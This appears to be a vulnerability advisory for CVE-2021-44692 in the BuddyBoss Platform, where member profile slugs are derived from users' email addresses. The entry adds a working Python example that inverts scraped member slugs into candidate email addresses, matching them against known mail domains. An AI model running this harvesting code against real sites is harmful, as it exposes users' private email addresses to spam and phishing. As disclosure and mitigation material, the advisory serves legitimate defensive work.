PT-2022-12203 · Unknown · Buddyboss Platform

Published 2022-01-26 · Updated 2022-02-02 · CVE-2021-44692

CVSS v3.1: 5.3 (Medium)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions: BuddyBoss Platform versions 1.8.0 and earlier
Description: The issue allows remote attackers to obtain the email address of every registered user. When a new user is created, the slug of their profile URL is derived from their private email address: the address is lowercased, symbols such as "@" are removed, and periods are replaced with hyphens. For example, JohnDoe@example.com becomes /members/johndoeexample-com and Jo.test@example.com becomes /members/jo-testexample-com. The members list is visible to everyone and, in the default configuration, often without authentication, so collecting a list of email addresses is trivial. Because the "@" is dropped, a slug on its own does not show where the local part ends and the domain begins, and a hyphen may stand for an original period or an original hyphen; matching the tail of each slug against a list of common mail domains resolves most of them.
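The slug derivation and its inverse, as an added Python example that is not part of this advisory or of BuddyBoss's own code. It reproduces the transformation the description gives (lowercasing as the examples show, dropping "@" and other symbols, periods to hyphens); which characters survive besides letters and digits (here "_" and "-") is an assumption, as are the constructed member paths and domain list. recover_candidates() shows why the leak is practical even though the mapping is lossy: matching the slug's tail against a known mail domain fixes the "@" position, and each hyphen left in the local part expands to both a period and a hyphen.

```python
from __future__ import annotations

import re
from itertools import product

# Constructed sample input (not from the advisory): member URL paths as they
# would appear when scraped from a publicly readable /members/ list.
SAMPLE_MEMBER_PATHS = [
    "/members/johndoeexample-com",          # the advisory's JohnDoe@example.com
    "/members/jo-testexample-com",          # the advisory's Jo.test@example.com
    "/members/alice-smithmail-example-org",
    "/members/admin",                       # a slug that is not email-derived
]

# Constructed domain list for the demonstration; a real assessment would use a
# wordlist of common providers plus the target organisation's own domains.
KNOWN_DOMAINS = ["example.com", "mail.example.org", "example.org"]


def email_to_member_slug(email: str) -> str:
    """Reproduce the transformation the advisory describes.

    Lowercasing is taken from the advisory's examples (JohnDoe -> johndoe).
    Assumption: letters, digits, '.', '_' and '-' survive and every other
    character (including '@') is dropped, then '.' becomes '-'.
    """
    s = email.strip().lower()
    s = re.sub(r"[^a-z0-9._-]", "", s)
    return s.replace(".", "-")


def recover_candidates(member_path: str, known_domains: list[str]) -> list[str]:
    """Invert a member slug against every known domain whose slug form ends it.

    The '@' is gone, so the local-part/domain boundary is recovered by matching
    a known domain's slug ("example.com" -> "example-com") against the tail.
    Each '-' left in the local part may originally have been '.' or '-', so
    both readings are emitted; candidates are confirmed out of band.
    """
    slug = member_path.rstrip("/").rsplit("/", 1)[-1]
    candidates: list[str] = []
    for domain in known_domains:
        domain_slug = email_to_member_slug(domain)  # same mapping; a domain has no '@'
        if len(slug) <= len(domain_slug) or not slug.endswith(domain_slug):
            continue
        local = slug[: -len(domain_slug)]
        parts = local.split("-")
        if any(part == "" for part in parts):
            # A leading, trailing or doubled '-' means this domain split is
            # wrong (e.g. the real domain has one more label on the left).
            continue
        for seps in product(".-", repeat=len(parts) - 1):
            local_part = parts[0] + "".join(sep + part for sep, part in zip(seps, parts[1:]))
            candidates.append(f"{local_part}@{domain}")
    return candidates


def harvest(member_paths: list[str], known_domains: list[str]) -> dict[str, list[str]]:
    """Map every scraped member path to its candidate addresses (empty if none)."""
    return {path: recover_candidates(path, known_domains) for path in member_paths}


if __name__ == "__main__":
    for path, emails in harvest(SAMPLE_MEMBER_PATHS, KNOWN_DOMAINS).items():
        print(f"{path}: {', '.join(emails) or '(no candidate)'}")
```

Running the block over the constructed paths yields one candidate for johndoeexample-com, two each for the slugs containing a hyphen in the local part (the period and hyphen readings), and none for a slug such as admin that matches no known domain, which is the same triage an attacker would apply to a scraped members list.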
Recommendations: For BuddyBoss Platform versions 1.8.0 and earlier, restrict access to the members list to minimize the risk of exploitation, since in the default configuration it is available to everyone and often without authentication. Note that this hides only the index: the slugs of existing accounts still embed their addresses, so individual profile URLs remain sensitive. At the time of writing there is no information about a newer version that contains a fix for this vulnerability.

Information Disclosure

Related Identifiers

CVE-2021-44692

Affected Products

Buddyboss Platform